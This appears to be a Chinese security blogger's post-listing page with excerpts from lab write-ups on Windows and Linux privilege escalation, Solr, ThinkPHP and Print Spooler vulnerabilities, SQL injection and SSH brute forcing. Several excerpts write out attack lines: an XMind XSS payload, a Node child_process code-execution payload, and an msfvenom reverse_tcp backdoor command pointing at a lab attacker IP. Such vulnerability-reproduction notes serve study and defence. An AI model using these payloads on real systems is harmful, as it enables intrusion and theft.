自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(37)
  • 收藏
  • 关注

原创 Windows Print Spooler远程代码执行漏洞复现(CVE-2021-1675)

目录漏洞概述漏洞复现一、PowerShell脚本实现本地提权二、Windows Print Spooler RCE域控MSF上线Cobalt Strike上线三、mimikatz武器化攻击漏洞防御参考链接漏洞概述Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该

2021-07-05 21:57:10 4959 2

原创 Apache Solr漏洞总结(比较全面的哦)

目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案2.远程命令执行XXE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案3.任意文件读取AND命令执行(CVE-2019-17558)漏洞详情漏洞复现3.1代码执行3.2任意文件读取影响版本修复方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞复现影响版本修复方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞复现影响版本修复方案6.未授权

2021-06-11 22:50:21 15037 4

原创 Xray与Goby、Burp联动

目录联动篇Xray与Rad联动Xray与Goby联动Xray与burp联动参考文献联动篇Xray和goby在这里就不赘述了Xray与Rad联动现在xray端起一个监听127.0.0.1:7777命令:xray webscan --listen 127.0.0.1:7777 --html-output proxy.html然后在rad端起一个爬虫。命令:rad -t http://example.com -http-proxy 127.0.0.1:7777Xray与Goby联动先

2021-06-11 22:02:07 6159 2

原创 bypassUAC提权

目录Windows UAC概述UAC结构图UAC组件描述UAC滑块设置UAC可授权的控制漏洞提权UAC提权之MSF1、bypassuac提权2、bypassuac_eventvwr提权3、RunAs提权UAC提权之Empire1、bapassuac模块提权2、bapassuac_wscript模块提权UAC提权之CSUAC提权之powershell参考文献Windows UAC概述用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作

2021-06-07 21:30:59 1476

原创 kerboros协议讲解

目录协议概述原理介绍证书的构成为:认证步骤详解:举个栗子相关名词参考文献协议概述这个协议以希腊神话中的人物Kerberos(或者Cerberus)命名,他在希腊神话中是Hades的一条凶猛的三头保卫神犬。Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos

2021-06-06 17:09:14 694 2

原创 注册表键AlwaysInstall提权

目录漏洞描述1.1Windows install概述1.2注册表键AlwaysInstallElevated概述漏洞原因1、没有获取meterpreter的情况下2、获取meterpreter的情况下2.1msf提权2.1msi安装文件提权参考文献漏洞描述1.1Windows install概述微软Windows Installer作为Win2K/WinXP/WinVista的组件之一,是专门用来管理和配置软件服务的工具。作为额外的产品提供,允许用户有效地安装与配置软件产品与应用程序。Install

2021-05-23 16:31:03 670

原创 Windows系统服务权限配置错误漏洞提权

目录漏洞介绍AccessChk工具介绍AccessChk常用参数漏洞检查AccessChk工具检查Powerup脚本检查Empire powerup模块检查MSF 上传脚本扫描漏洞利用漏洞防范如何创建服务删除服务参考文献漏洞介绍系统服务权限配置错误,在Windows系统中的服务权限都配置的那么完美总会有被忽视的地方,这些没有得到严格保护的系统服务,往往会被攻击者利用,系统服务权限设置有问题时,往往会导致如下风险,1、服务未运行攻击者会利用生成的服务替换掉原来的服务重启后提权,2、服务运行无法停止攻击者会

2021-05-17 00:36:19 1844

原创 XMind 2020/2021 beat版本xss漏洞复现

XMind概述XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。漏洞利用##证明xss payload<img src=x onerror=alert(/hack/)>##代码执行payloadrequire('child_process').exec('systeminfo',(error, stdout,

2021-05-12 01:45:15 610 2

原创 常见工控通讯协议(ICS)

工控网络概述工业网络是当前工业控制领域的研究热点。工业网络重点在于利用交换式以太网技术为控制器和操作站,各种工作站之间的相互协调合作提供一种交互机制并和上层信息网络无缝集成,而工业网络是一种特殊的,用于工业自动化领域去完成自动控制任务的计算机网络。工控通讯协议Modbus施耐德S7西门子FF基金会现场总线PROFIBUS西门子CIP通用工业协议CAN控制器局域网LonWorks现场总线协议简单概述Modbus协议Modbus是一种

2021-05-10 17:36:00 15285 3

原创 ThinkPHP漏洞总结(利用)

ThinkPHP介绍ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。...

2021-04-26 01:22:44 16081

原创 Empire内网渗透工具简单使用

文章目录工具介绍下载地址功能介绍设置监听生成木马后门1、Windows launcher_bat批处理脚本木马2、Windows dll动态链接文件木马3、Windows launcher_vbs 脚本木马4、Windows powershell payload脚本上线5、Windows macro(office宏)木马6、linux bash payload脚本上线Agent上线Interact 切换agents常用参数参考文献工具介绍Empire是一款强大的Powershell脚本利用框架,类似于M

2021-04-24 21:24:29 2048

原创 Linux sudo本地提权漏洞(CVE-2021-3156)

Linux sudo本地提权漏洞漏洞介绍Qualys研究小组在sudo中发现了堆溢出漏洞,这是一个几乎无处不在的实用工具,可以在主要的类Unix操作系统上使用。任何非特权用户都可以利用此漏洞在易受攻击的主机上使用默认sudo配置获得根权限。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就

2021-02-02 15:58:36 2425 6

原创 网络安全等级保护标准

网络安全等级保护相关标准类别1、基础类标准《计算机信息系统安全保护等级划分准则》(GB17859-1999)2、应用类标准(1)网络定级《信息系统安全等级保护定级指南》(GB/T 22240-2008)《网络安全等级保护定级指南》(GA/T 1389-2017)(2)等级保护实施《信息系统安全等级保护实施指南》(GB/T 25058-2010)(3)网络安全建设《信息系统安全等级保护基本要求》(GB/T 22239-2008)《信息系统通用安全技术要求》(GB/T 20271-2006

2021-02-01 17:30:47 1249

原创 网络安全等级保护概述

1、等级保护是什么?网络安全等级保护是指对网络(含信息系统、数据,下同)实施分等级保护、分等级监督,对网络中使用的网络安全产品实行按等级管理,对网络中发生的安全事件分等级响应、处置。...

2021-02-01 10:15:38 2317

原创 Redis未授权访问漏洞复现

Redis介绍redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新

2021-01-29 09:51:26 4064 1

原创 Windows系统常用命令操作

Windows系统管理常用快捷命令gpedit.msc 本地组策略编辑器services.msc 系统服务secpol.msc 本地安全策略lusrmgr.msc 本地用户和组eventvwr.msc 事件查看器regedit.exe 注册表编辑器Windows系统常用DOS命令ping 命令参数:-t 不间断的ping-n 指定发送数据包。-l 指定数据包大小 (1-65500) -t,很早以前的死亡之ping-r 指定路由跳数ping内网主机for /L %D in

2020-11-27 16:58:24 672 2

原创 OpenSSL心脏滴血漏洞(CVE-2014-0160)

一、漏洞介绍2014年,互联网安全协议OpenSSL被爆出存在一种十分严重的漏洞。在黑客社区,被命名为“心脏滴血” ,黑客通过利用该漏洞,可以获取到%30开头的https网站的用户名和密码,漏洞还影响到使用OpenSSL加密的产品。二、漏洞分析OpenSSL是通过加密算法来保证数据通信的私密性。加密算法:对称加密算法(AES、DES、3DES)非对称加密算法(RSA/DSA/SHA/MD5)而OpenSSL是使用公开的非对称加密算法RSA来加密的。此次漏洞的成因是OpenSSL Heart

2020-11-10 20:38:28 9701

原创 ssh弱口令爆破

对目标主机的22端口进行弱口令爆破环境kali linux 攻击机metasploitable2 目标机步骤1、 打开终端利用nmap扫描工具对目标主机进行扫描 nmap -sT -v -O 192.168.235.140可以看到ssh的22号端口是打开着的2、 输入msfconsole 打开msf的终端窗口,输入search ssh_login可以看到相关的攻击载荷模块工具3、 msf终端中输入use auxiliary/scanner/ssh/ssh_login进入该攻击工具4

2020-08-08 12:00:01 11809

转载 Msf溢出phpMyAdmin

CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令环境kali linux 攻击机:ip 192.168.235.149metasploitable2 目标机:ip 192.168.235.140步骤1、 确保目标机与攻击机能够ping通2、 对目标主机进行端口扫描,使用nmap -sV -v 192.168.235.140可以看到Apache服务的端口是开着的3、 浏览器中输入地址192.168.235.140 访问目标主机4、 终端中输入dir

2020-08-08 11:50:16 477

原创 CVE-2016-0051(WebDaV)漏洞复现

MS16-016(WebDaV)漏洞复现目标机:win7x64 192.168.235.142攻击机:kali 192.168.235.1371、 确定目标主机和攻击机能够ping通2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端

2020-08-08 11:29:24 1650

原创 sql注入漏洞分析

SQL注入是什么sql注入是指利用sql语句,通过web向数据库提交sql语句不正当在未授权的情况下获取数据,sql注入曾被OWASP组织评为十大漏洞之首,可见sql注入漏洞的危害。SQL注入分为那几种数字型和字符型数字型一般不需要闭合。字符型一般需要闭合。闭合方式:单引号闭合:’双引号闭合:"单括号闭合:)双括号闭合:))单引括号闭合:’)双引括号闭合:")等。。。。。数字型注入演示?id=1 回显正常?id=1’报错查询过程select * from table wh

2020-06-20 10:52:11 815

原创 Sqli-labs(5-10)闯关

Sqli-labs(5)同前四关一样先?id=1?id=1结果报错这一关感觉是很像第一关,来用order by 和 union语句来试试,可以知道有几列,但是不回显,看来这个没啥卵用了。。。。Sqli-labs(5)这一关怎么尝试都是You are in…没有1-4关的那样回显。看来另寻出路了我们尝试用updatexml函数。...

2020-06-18 10:42:45 251

转载 DVWA-File upload

Low级别源代码如下<?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move

2020-06-15 20:33:34 159

原创 DVWA-Sql injection

DVWA之sql注入low级别附上源代码<?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($G

2020-06-15 20:22:15 222 2

转载 内网渗透学习-内网信息收集(一)

1、查看本地网络配置信息ipconfig /allsysteminfo查询操作系统相关信息systeminfo | findstr /B /C:"OS Name" /C:"OS Version"systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"echo %PROCESSOR_ARCHITECTURE%arp 查看网关等信息nbtstat -n查看本地netbios信息。winc product get name,version查看软件安装

2020-06-13 21:03:51 542

原创 内网渗透环境搭建

内网渗透内网渗透测试,其实很大程度上是域渗透测试。常见的内网环境一般是(Windows server2003-2019、Windows7)内网搭建所需环境Windows server 2012 R2 标准版Windows server 2008 R2 标准版Windows 7 旗舰版环境配置...

2020-06-11 16:05:28 3703 1

原创 IIS漏洞

IIS6.0解析漏洞1、当服务器解析.asa和.asp文件时,其中网站目录下的所有文件都会当做.asp文件来解析。在网站目录中新建一个test.asp的目录,再从test.asp目录下新建一个test.txt文档,在里面输入“你好世界”。本来test.txt文件是不会被IIS去解析的,但是放在以.asp的test.asp目录下确被当做asp解析。2、当文件为*.asp;abc.jpg时,也会被当做asp来执行,例如文件为test.asp;abc.jpg,结果照常解析。漏洞预防1、对网站目录

2020-06-07 20:49:40 652

转载 Java语法学习-对象和类

Java基础-关键字doubleintabstractsuperassertelseinterfaceswitchbooleanenumlongsynchronizedbreakextendsnativethisbytefinalnewthrowfinallypackagethrowsfloatcasecatchprivatetransientcharforprotected

2020-06-06 17:42:12 333

原创 CVE-2020-0796 - SMBv3漏洞复现与提权

CVE-2020-0796 - SMBv3提权微软发布安全公告,发布了一个最新的SMB远程代码执行漏洞( CVE-2020-0796 )“永恒之黑”,攻击者可以利用漏洞进行提权实现代码执行。提权准备工作1、首先下载扫描器,进行检测下载地址:https://github.com/ollypwn/SMBGhostpython3 scanner.py <ip>将Windows目标机的防火墙关闭,让攻击机可以ping通ip可以看到2、下载好可利用的POChttps://gi

2020-06-06 16:42:44 4876 1

转载 DVWA-Command Injection(命令注入)

Command injection 命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。Low先上一下源代码!<?phpif( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determi

2020-06-04 20:17:53 600

原创 Powershell使用

Powershell简述Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。Windows PowerShell v3将伴随着Microsoft Hyper-V 3.0和Windows Server 2012发布。PowerShell v3是一个Windows任

2020-06-02 16:26:38 659

原创 Java学习-Eclipse开发环境使用

1、先新建一个java项目名为helloword的项目2、新建一个与项目文件名为相同的类,必须相同!编写第一个程序,helloworldpackage helloworld;public class helloworld { public static void main(String []args) { System.out.println("Hello world!"); }}3、运行java文件,ctrl+F11或选择“Run”-“run”运行console控制台可以看

2020-05-29 17:06:17 339

原创 python学习-列表List

python中最常用的列表通过方括号括起,通过逗号分割,形成一组列表值,列表中包含数字和字符等。列表操作函数list.append(*)添加元素举例说明lis1=[1,2,3,4,5]lis2=['admin','password','root','yang']print("lis1[0]:",lis1[0])print("lis2[0:2]",lis2[0:2])python列表的操作List.apptend(添加),更新列表#添加lis = [1, 2

2020-05-29 10:53:21 391 1

转载 python-字符串

python读取字符串中的值ch1 = 'hello world'ch2 = 'Li si'print('ch1[0:5]:',ch1[0:5])print('ch2[0:5]:',ch2[0:5])python更新字符串char1 = "Hello world!"print('更新字符串:',char1[:6] + "世界!")python转义字符python字符串运算符a = 'hello'b = 'world'print('a+b 结果:',a+b)print(

2020-05-29 09:07:32 324

原创 python学习-基础语法

python第一个程序hello word!交互式环境下print('hello word!')脚本环境

2020-05-28 08:56:19 212

原创 Sqli-labs(1-4)基于GET报错的sql注入

sqli-lab(1-4)基于GET报错的注入sqli-lab(1)在地址后面输入?id=1,说明存在注入点。闭合报错

2020-05-27 10:52:02 298 1

转载 DVWA-Brute Force(暴力破解)

DVWA-Brute Force(暴力破解)Brute ForceBrute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一,如2014年轰动全国的12306“撞库”事件,实质就是暴力破解攻击。LOW级别源代码如下:<?phpif( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get pa

2020-05-21 20:18:55 730

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除